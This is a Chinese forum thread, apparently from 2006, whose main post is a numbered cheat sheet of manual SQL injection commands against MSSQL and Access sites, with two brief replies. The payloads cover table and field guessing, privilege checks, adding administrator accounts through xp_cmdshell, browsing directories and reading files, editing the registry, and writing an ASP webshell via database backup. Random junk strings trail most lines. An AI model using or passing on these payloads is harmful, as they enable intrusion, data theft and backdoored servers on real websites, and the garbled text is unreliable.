社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4276阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 o>).Cj  
  2.初步判断是否是mssql ;and user>0 q4R5<LW"  
>sfRI]OG  
  3.注入参数是字符'and [查询条件] and ''=' whmdcVh.  
Vr)<\h  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' b=g8eMm  
GQt8p[!  
  5.判断数据库系统 gD,1 06%  
-9%:ilX~  
  ;and (select count(*) from sysobjects)>0 mssql H2&@shOOQJ  
LM$W*  
  ;and (select count(*) from msysobjects)>0 access I(]}XZq  
9 8j>1 "8  
~T ]m>A!  
O ,J>/  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 r;/4F/6"  
%@wJ`F2a_  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 u5O+1sZ"6  
M=%l}FSTw(  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 aK&b{d  
UM!ENI|  
  9.(1)猜字段的ascii值(access) I, -hf=-  
||T2~Q*:y  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ?p9VO.^5  
^$%S &W  
  (2)猜字段的ascii值(mssql) RS"H8P 4W  
u\E?Y[1  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;o^eC!:/%  
Gn\_+Pj$  
  10.测试权限结构(mssql) C+?Hm1  
?5U2D%t  
{G|,\O1  
9:fOYT$8  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ?Y)vGlWDW<  
c;%_EN%  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- nA?`BOe(  
N/]o4o  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- VcAue!MN  
uXI_M)  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- X'wE7=29M  
|>27'#JC  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- V_>\ 9m  
_,zA ^*b  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- _]04lGx27  
Scp7X7{N  
  ;and 1=(select IS_MEMBER('db_owner'));-- /,1D)0  
\X<bH&x:z  
e`@ # *}A  
`Y BC  
  11.添加mssql和系统的帐户 INcg S MM  
X- pqw~$  
  ;exec master.dbo.sp_addlogin username;-- 7q?9Tj3  
  ;exec master.dbo.sp_password null,username,password;-- F|F]970  
$i&e[O7T;  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- O>qll 6]{@  
`D>S;[~S7  
  ;exec master.dbo.xp_cmdshell 'net user username password ~Cl){8o  
#OBJzf*p  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- F ;{n"3<  
.EpV;xq}  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- Cnnh7`  
^:6{22C{  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- WxW7qt  
7x#Ckep:I  
 gG uZ8:f  
<!L>Exh&r  
  12.(1)遍历目录 ^w(p8G_-w  
HqI t74+  
  ;create table dirs(paths varchar(100), id int) ykv94i?Q  
;E@G`=0St  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' pR `>b 3  
6Ca(U'  
  ;and (select top 1 paths from dirs)>0 C2@,BCR  
Ol1e/Wv  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) =6woWlfb  
'=[?~0(B  
4?0vso*X<:  
">~.$Jp_4  
  (2)遍历目录 7Ok;Lt!x  
2}YOcnB  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- aJYgzr,  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 z)'Mk[  
"vXxv'0\f  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Tg!i%v(-t  
xG}(5Tt  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 A{UULVp  
y(Y!?X I  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 F_Z- 8>P  
;} und*q  
kdCUORMK  
pcau}5 .  
  13.mssql中的存储过程 LAVAFlK5  
&F\?  
  xp_regenumvalues 注册表根键, 子键 Em?d*z  
JXCCTUO  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 }tsYJlh5  
"u6`m?  
  xp_regread 根键,子键,键值名 }Mo=PWI1?  
@|<<H3I  
  ;exec xp_regread :{qv~&+C  
]GN7+ 8l  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 sW)Zi  
ld3-C55  
  xp_regwrite 根键,子键, 值名, 值类型, 值 ~ (x;5{  
T;@;R %  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 HHiT]S9  
W- i&sUgy  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 |3F02  
A6GE,FhsG  
  xp_regdeletevalue 根键,子键,值名 7w 37S  
f:ZAG4B  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ?g?L3vRK  
x 8Retuv  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 i7ISX>%  
kjEEuEv  
5nv<^>[J  
.gG1kWA-  
  14.mssql的backup创建webshell R>,:A%?^b5  
io,M{Ib  
  use model i-bJS6  
@Gx.q&H  
  create table cmd(str image); 1c<=A!"{  
A:aE|v/T&  
  insert into cmd(str) values (''); B+[A]dgS  
/GIxR6i  
  backup database model to disk='c:\l.asp'; s_x:T<]  
@7n/Q(  
=:DaS`~V  
 -QOw8vm  
  15.mssql内置函数 7h6,c/<  
j{Hao\F8  
  ;and (select @@version)>0 获得Windows的版本号 {T4  
`VKf3&|<A  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa {z(xFrY  
bA\<.d  
  ;and (select user_name())>0 爆当前系统的连接用户 YGv<VOWG2  
Yu?95qktP  
  ;and (select db_name())>0 得到当前连接的数据库 ^&bRX4pYo  
vr0WS3  
, #U .j  
@?=|Y  
  16.简洁的webshell 1U^A56CN  
YhOlxON  
  use model S|apw7C  
m>4ahue$  
  create table cmd(str image); q6_u@:3u  
JL\w_v  
  insert into cmd(str) values (''); 5m?8yT}  
xqC+0{] y  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
10+5=?,请输入中文答案:十五